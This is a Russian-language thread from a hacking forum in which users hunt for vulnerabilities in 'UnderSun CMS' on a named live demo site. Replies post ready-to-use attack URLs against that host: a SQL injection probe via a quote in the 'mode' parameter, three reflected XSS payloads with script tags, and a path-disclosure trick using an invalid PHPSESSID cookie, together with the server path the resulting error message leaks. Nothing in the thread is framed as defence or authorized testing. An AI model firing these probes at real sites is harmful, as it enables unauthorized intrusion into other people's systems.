Форум АНТИЧАТ - Кто что знает про эту CMS ?

Цитата:

Сообщение от moinick

Нужны любые баги, уязвимости..
demo.undersky.ru
demo.undersky.ru/admin/
http://demo.undersky.ru/rss.php?mode=1'&doc=5
Кто еще что подкинет?
Это просто пример, на этом движке
UnderSun CMS называется..

И так в GET запросе Mode
Ты поставил ', SQL иньекция это не ошибка, это выполнение произвольных команд. Запомни.

Цитата:

http://demo.undersky.ru/sites.html?p=2%22%3E%3Cscript%3Ealert();%3C/script%3E

Цитата:

http://demo.undersky.ru/forget_passw.html?answ=14%22%3E%3Cscript%3Ealert() ;%3C/script%3E

Цитата:

http://demo.undersky.ru/news.html?id=3%22%3E%3Cscript%3Ealert();%3C/script%3E

Кароч там всё с XSS
Раскрытие путей
В куках

Цитата:

PHPSESSID=@#$%^&*

Итог

Цитата:

Warning: session_start() [function.session-start]: The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /usr/home/undersun/domains/demo.undersky.ru/public_html/index.php on line 7

Кароч сайтег дырявенький